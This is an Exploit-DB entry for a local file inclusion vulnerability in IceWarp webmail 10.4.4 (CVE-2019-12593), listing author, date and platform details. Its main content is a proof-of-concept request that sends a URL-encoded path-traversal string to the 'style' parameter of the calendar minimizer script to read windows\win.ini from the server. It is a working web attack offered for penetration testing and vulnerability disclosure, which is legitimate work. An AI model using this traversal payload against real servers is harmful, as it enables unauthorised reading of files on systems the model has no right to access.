IceWarp 10.4.4 - Local File Inclusion

EDB-ID:

46959

CVE:

2019-12593

EDB Verified:

Author:

JameelNabbo

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2019-06-04

Vulnerable App:

# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:

http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

Tags: File Inclusion (LFI/RFI)

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services